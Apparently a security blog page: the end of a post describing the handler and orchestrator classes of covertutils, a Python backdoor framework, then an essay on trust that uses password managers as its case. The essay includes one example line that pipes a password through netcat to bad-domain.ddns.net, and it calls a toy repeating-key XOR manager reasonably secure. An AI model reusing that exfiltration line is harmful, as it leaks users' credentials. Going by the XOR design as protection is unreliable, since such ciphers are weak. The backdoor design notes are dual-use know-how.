At the time of writing, there are several Handler Classes implemented, each modelling a specific backdoor behavior.

  • BaseHandler
    This is the Base Class that exposes all abstract functions to the sub-class.
  • FunctionDictHandler
    Gets a (stream -> function) dict and for every message that arrives from stream x, the corresponding function is called with message as argument.
  • InterrogatingHandler
    This handler sends a constant message across to query for data. This is the way the classic reverse_http/s agents work: they periodically query the handler for commands, which are returned as responses. It couples with the ResponseOnlyHandler.
  • ResettableHandler
    This Handler accepts a constant value that resets all resettable components to their initial state: the One Time Pad key, the stream seeds, the chunker’s buffer, etc.
  • ResponseOnlyHandler
    This is the reverse of the InterrogatingHandler. It sits and waits for data. It sends data back only as responses to received data. Never Ad-Hoc.
  • StageableHandler
    This is a FunctionDictHandler that can be extended at runtime. It accepts serialized functions in special format from a dedicated stream, to add another tuple in the function-dict, extending functionality.

 

Orchestrators

The objects that handle the raw data to (stream, message) conversion are the Orchestrators.

They have some basic functionality of chunking, compression, stream tagging and encryption. They provide 2 methods, the readyMessage(message, stream) and the depositChunk(raw_data). The first one returns a list of data that are ready to be sent across (tagged, encrypted, etc), and the second one makes the Orchestrator try to consume data received and returns the (stream, message) tuple.

 

End of Part 1

The whole package includes several features that are not even mentioned in this article (Steganography, Data Mangling – the StegoInjector and DataTransformer classes – etc), which, while implemented, aren’t properly documented yet, so their internals may change.

They will be the subject of another post, along with a Pozzo & Lucky implementation using only covertutils and Raw Sockets.

 

In the meantime, there are some Example Programs for you to play around with!

Feedback is always appreciated…

 

Trust: a tale of Security, Philosophy, Reverse Engineering and Python

The role of Trust on InfoSec Incidents

Security boils down to being entirely about trust, if you come to think of it. Every information security incident could somehow be rephrased to include the word “Trust” in the reasons it happened. Just try anything:

  • SQL Injections all over the Web (and injection family exploits): “Mistrusted user input”.
  • Cross-Site Scripting: Mistrusting that a site will run only non-malicious code in your browser.
  • Superfish Incident: Addition of an untrusted SSL Certificate to the Trust List of all Lenovo computers.
  • Stuxnet:
    • Enough trust to a USB removable medium for it to be plugged in an “Air-gapped” computer.
    • Trust of the engineers on what they see (the backdoored health monitoring indication of the centrifuges) rather than what they hear (the centrifuges screaming as they were over-spinning).
  • Heartbleed, Shellshock: Trust in Open Source code auditing (as those were glaring bugs – and not the only ones)
  • Snowden’s leaks (it is a Security Incident for the 3-letter guys): Too much Trust in an employee (even a highly positioned one).
  • … add your favorite Incident here …

And I mean all Security, Crypto included…

Encryption algorithms are trusted to be working. I mean, there are proofs that they work (work means that decryption undoes encryption), but there aren’t proofs that there is no way to easily deduce the key (easily meaning “easier than brute force”). There are also “Backdoored Ciphers” (with DES flirting closely with this speculation). Do we Trust these? Of course not! Did we trust them before speculating or proving they were backdoored? Sure, I mean, why not (DES was the fuckin’ Encryption Standard, as its name implies).

In the same manner: today we trust AES. If tomorrow we find out that there is a way to (instantly) decrypt every AES communication, we won’t trust it anymore. Meanwhile someone is reading us… And we have ourselves another trust-based security incident.

 

Why Trust anyway?

As Ernst Alexander Rauter put it in his famous “Creating subject people – How an opinion forms in the mind” (a book that isn’t sold on Amazon in English – German edition): “Trust is something that always flows upwards, from people with less power to people with more power“. This is a very rough translation of the fact that people tend to trust things they don’t manipulate themselves. Also, people never want to feel scammed, so, rather than explore an unwanted truth, they prefer to just “trust“.

That’s why we trust crypto, and we trust our Operating System or our car. Because we can’t be 100% sure about their actions. So we politely assume that everything works as intended. Just to be gentle with ourselves.

 

The Trust Game in Computers

One of UNIX’s fathers, Ken Thompson (apart from being the reason you see a.out files when compiling without arguments), posed a groundbreaking question in 1984 (a really controversial date!): “Do you trust your compiler? Do you trust your compiler so much that you are sure that when you compile the /bin/login binary, it won’t plant a backdoor in it?“. I am talking about the well-known “Ken Thompson Hack”, documented in his awesome paper “Reflections on Trusting Trust“.

The truth is we trust our default gcc installation, and – seriously – we never questioned it. It seems far-fetched to believe that there is such a possibility. The reason is that we would have to be reverse engineers to actually Check It. And this isn’t the case for most of us…

 

 

Asking for and gaining Trust

My case study subject

Do you know about the kind of application called “Password Manager“? Applications like  “KeePass” that keep all your passwords in one place. They save them to disk in encrypted form and copy them to your clipboard whenever you need them, while you protect them all with a single “Master Password/Decryption Key“.

Asking for Trust

Those applications need a whole lot of trust from their users. They could easily exfiltrate all your passwords to an unknown location without you noticing. In reality, the only password worth exfiltrating is your email account’s password. If someone gets your email password, the “Forgot my Password” button can do the rest of the work on every website you’ve registered on…

Gaining Trust

So how does an application so crucial to your privacy gain Trust?

Well, most of the time it doesn’t. Most of the time people assume that the binaries they download will do what they are described to do. Even their DLLs. But that’s because most people can’t actually check what an executable is doing. They trust because of their inability to know.

We need to go deeper

For an infosec researcher, trust is gained. I trust that nmap works the way it works because I have wireshark‘d it a whole lot of times. I am sure the https meterpreter is stealthy enough in many cases, as I had it bypass my own firewall first. And I trust that keepass doesn’t make remote connections because of this:

n0p_sl3d@hostname:~$ objdump -D $(which keepassx) | grep socket
n0p_sl3d@hostname:~$

while:

n0p_sl3d@hostname:~$ objdump -D $(which netcat) | grep socket | wc -l
874

If you are used to C-language Socket Programming, you know that the way to open a network connection is through the socket function. And, in the unstripped, non-statically compiled version of keepassx I use, there are no such calls in the binary. That’s definitely a good sign! Some trust is gained now!

But if you think of it, a call like:

system("echo %s | nc bad-domain.ddns.net 8080" % email_password);

doesn’t create a socket itself but would still exfiltrate my password. That’s why keepass is Open Source. Just grep the code for similar-looking calls; if you find any, keepass is a nasty traitor…

Sure, that’s a lot of work, but it is also your call how far you go. It depends on how much you value your passwords. It’s a trade-off.

 

 For the Unconvinced

If keepass has a backdoor (while being open-source), it has to be hidden in a smart way. And since you don’t know the author, you can’t be sure about his intentions. The only way to trust some things is to be 100% sure about how they operate. That brings us to the last part of this post:

 

100% Trust

The person highest in the Trust Scale we maintain inside us is ourselves. We ultimately believe our own eyes and hands. The Password Manager we will trust the most is the one we write ourselves, or one whose code we have carefully gone through and understood line by line.

This tends to be impossible for most Open Source projects, sometimes even for their contributors. Trust in Open Source projects calls for smaller, more comprehensible projects, written in a Programming Language for humans, if the desired 100% is to be achieved…

 

Python to the rescue!

There are like 15 actively used Programming Languages nowadays, but the only ones that maintain even a tiny chance of being understood in the blink of an eye are the English-like scripting ones (that means Python, basically).

So the goal was to create a Proof of Concept Python Password Manager that wouldn’t exceed 50 lines of code (single file) and would provide reasonable security, while being as easy to understand as possible and maintaining the basic features. That way people could use it and be absolutely sure about what it does. The goal was to convince the unconvinced that this tool works as intended and only as intended. And here it is!

TinyPwdMan

TinyPwdMan‘s code can be found here: https://github.com/operatorequals/TinyPwdMan/blob/master/TinyPwdMan.py

The Source Code fits in a single page without scrolling! It uses a master password, XOR encryption and can even copy to the clipboard. Its initial size is 38 lines.
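
The core trick is repeating-key XOR. A toy illustration of the idea (not TinyPwdMan’s actual code – see the repository above for that):

from itertools import cycle

def xor(data: bytes, key: bytes) -> bytes:
    # XOR with a repeating key is symmetric: the same call encrypts and decrypts.
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

secret = xor(b"hunter2", b"MasterPassword")
print(xor(secret, b"MasterPassword"))  # b'hunter2'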

It isn’t designed for real use (though it works flawlessly), but as a demonstration of what can really be absolutely trusted, and what is trusted only because of its convenience. Because let me tell you: keepass blows that little Password Manager out of the water when it comes to convenience.

Either way, your passwords are as unsafe as the weakest link of the chain in which you use them. From mind, to keyboard, to OS, to application, to network, to the other side.

And the weakest link is not the encryption, nor the possibility of an exfiltration that would cost a Password Manager Author his reputation (once discovered), and probably his career and life.

The weakest link is you!

 
